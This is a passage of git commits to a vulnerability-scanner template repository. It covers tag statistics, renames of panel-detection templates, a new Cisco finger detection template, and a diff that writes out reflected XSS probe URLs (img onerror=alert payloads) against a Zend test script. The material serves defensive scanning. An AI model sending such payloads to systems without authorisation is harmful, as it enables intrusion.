+| mojoauth | 1 | | | | | | | | | +| micro-user-service | 1 | | | | | | | | | +| uservoice | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| ssi | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| shortpixel | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| openmage | 1 | | | | | | | | | +| awx | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| ngrok | 1 | | | | | | | | | +| flahscookie | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| jinher | 1 | | | | | | | | | +| msmtp | 1 | | | | | | | | | +| flowci | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| pdflayer | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| open-school | 1 | | | | | | | | | +| roteador | 1 | | | | | | | | | +| sofneta | 1 | | | | | | | | | +| acunetix | 1 | | | | | | | | | +| esxi | 1 | | | | | | | | | +| tox | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| objectinjection | 1 | | | | | | | | | +| fortiproxy | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| aims | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| kodi | 1 | | | | | | | | | +| calendarific | 1 | | | | | | | | | +| officekeeper | 1 | | | | | | | | | +| retool | 1 | | | | | | | | | +| smarterstats | 1 | | | | | | | | | +| juniper | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| zentao | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| dwr | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| webasyst | 1 | | | | | | | | | +| remedy | 1 | | | | | | | | | +| xibocms | 1 | | | | | | | | | +| privx | 1 | | | | | | | | | +| avigilon | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| ubiquiti | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| tembosocial | 1 | | | | | | | | | +| gnuboard5 | 1 | | | | | | | | | +| ecsimagingpacs | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| agentejo | 1 | | | | | | | | | +| turbo | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| prexview | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| rollupjs | 1 | | | | | | | | | +| netbiblio | 1 | | | | | | | | | +| mspcontrol | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| readthedocs | 1 | | | | | | | | | +| member-hero | 1 | | | | | | | | | +| babel | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| defi | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| browshot | 1 | | | | | | | | | +| phabricator | 1 | | | | | | | | | +| nj2000 | 1 | | | | | | | | | +| shirnecms | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| nozomi | 1 | | | | | | | | | +| zenrows | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| oliver | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| dolphinscheduler | 1 | | | | | | | | | +| terraboard | 1 | | | | | | | | | +| browserless | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| domino | 1 | | | | | | | | | +| rpcms | 1 | | | | | | | | | +| teradici | 1 | | | | | | | | | +| cvms | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| bscw | 1 | | | | | | | | | +| totolink | 1 | | | | | | | | | +| fanwei | 1 | | | | | | | | | +| opsgenie | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| soplanning | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| shopify | 1 | | | | | | | | | +| pubsec | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| goliath | 1 | | | | | | | | | +| kenesto | 1 | | | | | | | | | +| fuji | 1 | | | | | | | | | +| cybrotech | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| hivemanager | 1 | | | | | | | | | +| monday | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| securitytrails | 1 | | | | | | | | | +| v2924 | 1 | | | | | | | | | +| phpmemcached | 1 | | | | | | | | | +| blitapp | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| pcoweb | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| 3com | 1 | | | | | | | | | +| h-sphere | 1 | | | | | | | | | +| microcomputers | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| biqsdrive | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| currencyfreaks | 1 | | | | | | | | | +| harvardart | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | +| netweaver | 1 | | | | | | | | | +| mofi | 1 | | | | | | | | | +| orbintelligence | 1 | | | | | | | | | +| ecshop | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| pagekit | 1 | | | | | | | | | +| mongo-express | 1 | | | | | | | | | +| fastly | 1 | | | | | | | | | +| footprints | 1 | | | | | | | | | +| gemfury | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| savepage | 1 | | | | | | | | | +| prestahome | 1 | | | | | | | | | +| wampserver | 1 | | | | | | | | | +| raspberrymatic | 1 | | | | | | | | | +| opengraphr | 1 | | | | | | | | | +| workresources | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| file-upload | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| pop3 | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| likebtn-like-button | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| stackstorm | 1 | | | | | | | | | +| qmail | 1 | | | | | | | | | +| icc-pro | 1 | | | | | | | | | +| woody | 1 | | | | | | | | | +| flowdash | 1 | | | | | | | | | +| proxykingdom | 1 | | | | | | | | | +| sungrow | 1 | | | | | | | | | +| caddy | 1 | | | | | | | | | +| patheon | 1 | | | | | | | | | +| rss | 1 | | | | | | | | | +| siteomat | 1 | | | | | | | | | +| avatier | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| cmsimple | 1 | | | | | | | | | +| namedprocess | 1 | | | | | | | | | +| airtable | 1 | | | | | | | | | +| kerio | 1 | | | | | | | | | +| comfortel | 1 | | | | | | | | | +| drive | 1 | | | | | | | | | +| piano | 1 | | | | | | | | | +| etcd | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| kodexplorer | 1 | | | | | | | | | +| ticketmaster | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| jupyterhub | 1 | | | | | | | | | +| onkyo | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| block | 1 | | | | | | | | | +| junos | 1 | | | | | | | | | +| gnu | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| opensearch | 1 | | | | | | | | | +| ucp | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| verint | 1 | | | | | | | | | +| getgrav | 1 | | | | | | | | | +| cryptocurrencies | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| simpleclientmanagement | 1 | | | | | | | | | +| coverity | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| buildbot | 1 | | | | | | | | | +| nagios-xi | 1 | | | | | | | | | +| mi | 1 | | | | | | | | | +| biotime | 1 | | | | | | | | | +| webshell | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| sling | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| nodebb | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| bonita | 1 | | | | | | | | | +| mercurial | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| powerjob | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| nsicg | 1 | | | | | | | | | +| ilch | 1 | | | | | | | | | +| cuteeditor | 1 | | | | | | | | | +| scrapingdog | 1 | | | | | | | | | +| screenshotapi | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| free5gc | 1 | | | | | | | | | +| web3 | 1 | | | | | | | | | +| caa | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| openshift | 1 | | | | | | | | | +| elmah | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| uberflip | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| zoomsounds | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | | +| bhagavadgita | 1 | | | | | | | | | +| jalios | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| hdnetwork | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| analytify | 1 | | | | | | | | | +| stytch | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| mgrng | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| agilecrm | 1 | | | | | | | | | +| headers | 1 | | | | | | | | | +| lfw | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| supportivekoala | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| sensei-lms | 1 | | | | | | | | | +| aryanic | 1 | | | | | | | | | +| e-mobile | 1 | | | | | | | | | +| airee | 1 | | | | | | | | | +| pghero | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| garagemanagementsystem | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| radius | 1 | | | | | | | | | +| webviewer | 1 | | | | | | | | | +| stats | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| vault | 1 | | | | | | | | | +| pandorafms | 1 | | | | | | | | | +| envoy | 1 | | | | | | | | | +| cname | 1 | | | | | | | | | +| cve2000 | 1 | | | | | | | | | +| mongoose | 1 | | | | | | | | | +| np | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| bitdefender | 1 | | | | | | | | | +| ti-woocommerce-wishlist | 1 | | | | | | | | | +| shindig | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| holidayapi | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| currencyscoop | 1 | | | | | | | | | +| hypertest | 1 | | | | | | | | | +| tls | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| gpon | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| concrete5 | 1 | | | | | | | | | +| collectd | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| patreon-connect | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| html2wp | 1 | | | | | | | | | +| macaddresslookup | 1 | | | | | | | | | +| ruoyi | 1 | | | | | | | | | +| wordpress-country-selector | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| vertex | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| rsa | 1 | | | | | | | | | +| rainloop | 1 | | | | | | | | | +| curcy | 1 | | | | | | | | | +| wptouch | 1 | | | | | | | | | +| AlphaWeb | 1 | | | | | | | | | +| graphiql | 1 | | | | | | | | | +| html2pdf | 1 | | | | | | | | | +| incomcms | 1 | | | | | | | | | +| jmeter | 1 | | | | | | | | | +| ccm | 1 | | | | | | | | | +| director | 1 | | | | | | | | | +| atg | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| spinnaker | 1 | | | | | | | | | +| telecom | 1 | | | | | | | | | +| flureedb | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| ojs | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| olt | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| jreport | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| qvidium | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| wpcargo | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| appsmith | 1 | | | | | | | | | +| strikingly | 1 | | | | | | | | | +| mastodon | 1 | | | | | | | | | +| cve2001 | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| vcloud | 1 | | | | | | | | | +| mailwatch | 1 | | | | | | | | | +| segment | 1 | | | | | | | | | +| pyproject | 1 | | | | | | | | | +| h2 | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| fastpanel | 1 | | | | | | | | | +| binom | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| bibliopac | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| backupbuddy | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | +| davantis | 1 | | | | | | | | | +| logger1000 | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| nzbget | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| quixplorer | 1 | | | | | | | | | +| bacnet | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| pagecdn | 1 | | | | | | | | | +| machproweb | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 6f439c586e..d3507f9b19 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 | -| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 | -| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 | +| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 | +| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 | +| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 | | exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | -| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | | -| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | | -| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | | -| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | | -| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | | -| tech | 357 | princechaddha | 153 | file | 78 | | | | | +| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | | +| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | | +| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | | +| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | | +| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | +| tech | 360 | princechaddha | 153 | file | 78 | | | | | From a9ade0bd0f9fe63fb7044ca2ba60e9bf880bc38b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:33:53 +0000 Subject: [PATCH 1098/1415] Auto README Update [Wed Dec 7 09:33:53 UTC 2022] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index bfd9c83aa8..f8f3e9f053 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 | -| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 | -| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 | +| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 | +| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 | +| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 | | exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | -| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | | -| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | | -| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | | -| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | | -| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | | -| tech | 357 | princechaddha | 153 | file | 78 | | | | | +| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | | +| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | | +| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | | +| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | | +| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | +| tech | 360 | princechaddha | 153 | file | 78 | | | | | -**321 directories, 4733 files**. +**321 directories, 4736 files**. </td> </tr> From 972bafe93e37e13634ef36f0533f85b1e049aa9e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:42:26 +0000 Subject: [PATCH 1099/1415] Auto Generated CVE annotations [Wed Dec 7 09:42:26 UTC 2022] :robot: --- vulnerabilities/wordpress/wp-related-post-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-related-post-xss.yaml b/vulnerabilities/wordpress/wp-related-post-xss.yaml index a254d86a6f..e35bb23a11 100644 --- a/vulnerabilities/wordpress/wp-related-post-xss.yaml +++ b/vulnerabilities/wordpress/wp-related-post-xss.yaml @@ -11,7 +11,7 @@ info: - https://wordpress.org/plugins/wordpress-23-related-posts-plugin/advanced/ metadata: verified: true - tags: wordpress,wp,wp-plugin,xss,relatedposts,authenticated + tags: wp-plugin,xss,relatedposts,authenticated,huntr,wordpress,wp requests: - raw: From 5fc63a1b3fb9123cf688269850c17caa49bc5123 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 16:31:33 +0530 Subject: [PATCH 1101/1415] Update and rename aircube-dashboard-panel to aircube-dashboard-panel.yaml --- .../{aircube-dashboard-panel => aircube-dashboard-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{aircube-dashboard-panel => aircube-dashboard-panel.yaml} (100%) diff --git a/exposed-panels/aircube-dashboard-panel b/exposed-panels/aircube-dashboard-panel.yaml similarity index 100% rename from exposed-panels/aircube-dashboard-panel rename to exposed-panels/aircube-dashboard-panel.yaml From 5d1472b6fbdb650117d7c3bd87e5df5ec12d5019 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 16:51:19 +0530 Subject: [PATCH 1102/1415] Update netris-dashboard-panel.yaml --- exposed-panels/netris-dashboard-panel.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/exposed-panels/netris-dashboard-panel.yaml b/exposed-panels/netris-dashboard-panel.yaml index a6c1277976..8903b81b62 100644 --- a/exposed-panels/netris-dashboard-panel.yaml +++ b/exposed-panels/netris-dashboard-panel.yaml @@ -14,9 +14,6 @@ requests: path: - '{{BaseURL}}' - host-redirects: true - max-redirects: 2 - matchers-condition: and matchers: - type: word From 3b95be42a3cf3a2d90833d888e4c3dc27f0e3408 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 16:58:04 +0530 Subject: [PATCH 1103/1415] Update mag-dashboard-login.yaml --- exposed-panels/mag-dashboard-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/mag-dashboard-login.yaml b/exposed-panels/mag-dashboard-login.yaml index 90c662d403..5c93554ab5 100644 --- a/exposed-panels/mag-dashboard-login.yaml +++ b/exposed-panels/mag-dashboard-login.yaml @@ -1,7 +1,7 @@ -id: mag-dashboard-login +id: mag-dashboard-panel info: - name: MAG Dashboard Login + name: MAG Dashboard Panel author: theamanrawat severity: info metadata: From c93fc1edb901ad0baa90e2b3a772daa65ec523fc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 17:01:54 +0530 Subject: [PATCH 1104/1415] Update metaview-explorer-installer.yaml --- misconfiguration/installer/metaview-explorer-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/installer/metaview-explorer-installer.yaml b/misconfiguration/installer/metaview-explorer-installer.yaml index c3b302b70a..73812bbf97 100644 --- a/misconfiguration/installer/metaview-explorer-installer.yaml +++ b/misconfiguration/installer/metaview-explorer-installer.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"MetaView Explorer" - tags: metaview,installer,misconfig + tags: misconfig,metaview,installer requests: - method: GET From f514265ce6a80015a19366c977da84d45994ff6c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 11:32:30 +0000 Subject: [PATCH 1105/1415] Auto Generated New Template Addition List [Wed Dec 7 11:32:30 UTC 2022] :robot: --- .new-additions | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.new-additions b/.new-additions index 54d7352fa9..f80fe468cd 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,2 @@ -exposed-panels/jcms-panel.yaml -technologies/pypiserver-detect.yaml +exposed-panels/aircube-dashboard-panel.yaml +exposed-panels/netris-dashboard-panel.yaml From 90333cb8e09c0ae7de04aab4cd73300a6a1e0a34 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 17:02:49 +0530 Subject: [PATCH 1107/1415] Rename mag-dashboard-login.yaml to mag-dashboard-panel.yaml --- .../{mag-dashboard-login.yaml => mag-dashboard-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{mag-dashboard-login.yaml => mag-dashboard-panel.yaml} (100%) diff --git a/exposed-panels/mag-dashboard-login.yaml b/exposed-panels/mag-dashboard-panel.yaml similarity index 100% rename from exposed-panels/mag-dashboard-login.yaml rename to exposed-panels/mag-dashboard-panel.yaml From 5ee6aa48e4ec5f582ccc6f9d014ad5edabdc9277 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 11:34:20 +0000 Subject: [PATCH 1108/1415] Auto Generated New Template Addition List [Wed Dec 7 11:34:20 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f80fe468cd..99189852c6 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ exposed-panels/aircube-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml +misconfiguration/installer/metaview-explorer-installer.yaml From cc4d470efca10d5558d2802e21c7e1f6eb622727 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 11:35:06 +0000 Subject: [PATCH 1109/1415] Auto Generated New Template Addition List [Wed Dec 7 11:35:05 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 99189852c6..6361e35b4b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ exposed-panels/aircube-dashboard-panel.yaml +exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml From 94f4e01212040755ee5ed3b7dd62f56c423d641d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 12:35:54 +0000 Subject: [PATCH 1110/1415] Auto Generated New Template Addition List [Wed Dec 7 12:35:54 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6361e35b4b..9be8811cad 100644 --- a/.new-additions +++ b/.new-additions @@ -2,3 +2,4 @@ exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml +network/detection/redis-detect.yaml From f417ca8a2b9aba4a3d680fae369fef010e8372ae Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 18:23:56 +0530 Subject: [PATCH 1111/1415] Update zend-v1-xss.yaml --- vulnerabilities/zend/zend-v1-xss.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/zend/zend-v1-xss.yaml b/vulnerabilities/zend/zend-v1-xss.yaml index 1b31b2ec8f..2f9dbda3b7 100644 --- a/vulnerabilities/zend/zend-v1-xss.yaml +++ b/vulnerabilities/zend/zend-v1-xss.yaml @@ -16,16 +16,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>%20a='{{randstr}}'>" - - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)%20a='{{randstr}}'>" + - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>%20a='test'>" + - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(document.domain)%20a='test'>" matchers-condition: and matchers: - type: word part: body words: - - '{{randstr}}' - - '<img/src=x onerror=alert(1)' + - '"redirection"]' + - '"param"' + - '<img/src=x onerror=alert(document.domain)' condition: and - type: status From edef7ef85412a5ce7000b0bda610fbee91a38f46 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 7 Dec 2022 18:44:26 +0530 Subject: [PATCH 1112/1415] Add files via upload --- network/detection/cisco-finger-detect.yaml | 29 ++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 network/detection/cisco-finger-detect.yaml diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml new file mode 100644 index 0000000000..474d738596 --- /dev/null +++ b/network/detection/cisco-finger-detect.yaml @@ -0,0 +1,29 @@ +id: cisco-finger-detect + +info: + name: Cisco Finger Daemon Detection + author: pussycat0x + severity: low + description: | + The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. + metadata: + verified: true + shodan-query: product:"Cisco fingerd" + tags: network,finger + +network: + - inputs: + - data: "\n" + + host: + - "{{Hostname}}" + - "{{Host}}:79" + + matchers: + - type: word + part: body + words: + - "Interface" + - "Mode" + - "User" + condition: and \ No newline at end of file From a033b96cebd187df642218bef477e870b19d723c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 19:22:26 +0530 Subject: [PATCH 1113/1415] Update zend-v1-xss.yaml --- vulnerabilities/zend/zend-v1-xss.yaml | 25 +++++++++++++------------ 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/vulnerabilities/zend/zend-v1-xss.yaml 